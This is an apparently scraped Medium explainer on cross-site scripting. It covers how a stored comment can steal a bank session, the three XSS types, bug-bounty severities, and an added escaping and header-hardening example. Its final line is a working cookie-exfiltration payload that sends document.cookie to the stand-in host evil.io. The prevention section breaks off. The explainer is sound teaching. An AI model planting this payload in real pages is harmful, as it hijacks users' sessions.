canonical_url: https://medium.com/@mahone0094/hackers-dont-need-your-password-anymore-they-just-need-one-unsanitized-input-7e8c87471070
By Bamdad Shahabi | CAISD — Cyber Intelligence & Digital Forensics
youtube.com/@CAISD_Official
XSS has been in the OWASP Top 10 for 20+ years.
Nobody handled it.
What is XSS?
XSS (Cross-Site Scripting) allows attackers
to inject malicious scripts into trusted websites.
The browser executes them because they appear
to come from a legitimate source.
How does XSS steal your session?
A user logs into their bank.
An attacker already stored this as a "comment":
Server stored it. No sanitization. No filtering.
Browser loads page — runs the script.
Session token flies to evil.io.
No password touched. Just trust abused.
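The stored-comment flow described above, as an added example that is not from the original article: the same stored comment rendered raw and with output encoding, plus response headers (a CSP and an HttpOnly session cookie) that block the cookie read. The function names, the session value and the sample comment are constructed for illustration.

```javascript
// Added example: a stored comment rendered without and with output encoding.
// All names here (escapeHtml, renderCommentUnsafe, ...) are hypothetical.

// Encode the five characters that let text break out of HTML element
// content or a quoted attribute value.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable: the stored value is concatenated into markup as-is,
// so the browser parses any tags in it as part of the page.
function renderCommentUnsafe(comment) {
  return '<li class="comment">' + comment + '</li>';
}

// Hardened: the stored value is encoded at output time, so it is
// displayed as text and never parsed as markup.
function renderCommentSafe(comment) {
  return '<li class="comment">' + escapeHtml(comment) + '</li>';
}

// Response headers that limit the damage if an encoding step is missed.
function hardenedHeaders(sessionId) {
  return {
    // Inline scripts and scripts from other origins are refused.
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'",
    // HttpOnly keeps the session cookie out of document.cookie.
    'Set-Cookie':
      `session=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`,
  };
}

// Constructed sample input: a harmless marker script standing in for a stored payload.
const storedComment = '<script>console.log("injected")</script>';
console.log(renderCommentUnsafe(storedComment));
console.log(renderCommentSafe(storedComment));
console.log(hardenedHeaders('constructed-session-id'));
```

Encoding belongs at output time and must match the context: this helper covers HTML element content and quoted attributes, not URLs or inline JavaScript.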
The 3 types of XSS
① Stored XSS — payload in database,
hits every user. P1 severity in bug bounty.
② Reflected XSS — bounces from URL,
needs a click. P2 severity.
③ DOM-based XSS — client-side only.
Server never sees it. WAFs are blind to it.
Bug Bounty severity
| Type | Severity |
|---|---|
| Stored XSS on authenticated endpoint | P1 |
| Session hijack via document.cookie | P1 |
| Reflected XSS on login page | P2 |
| DOM XSS bypassing WAF | P2 |
How to prevent XSS
✅ Content-Security-Policy:
CAISD: CYBERSCOPE ADVANCED INTELLIGENCE & SECURITY DIRECTORATE

Top comments (2)
A clear and accurate explanation of how XSS escalates from a simple injection flaw to a full trust‑boundary compromise. The session‑hijack example demonstrates exactly why unsanitized input remains one of the most exploited vectors in modern web applications. Strong emphasis on CSP and proper output encoding is essential, and this article highlights that well.
new Image().src='//evil.io?d='+document.cookie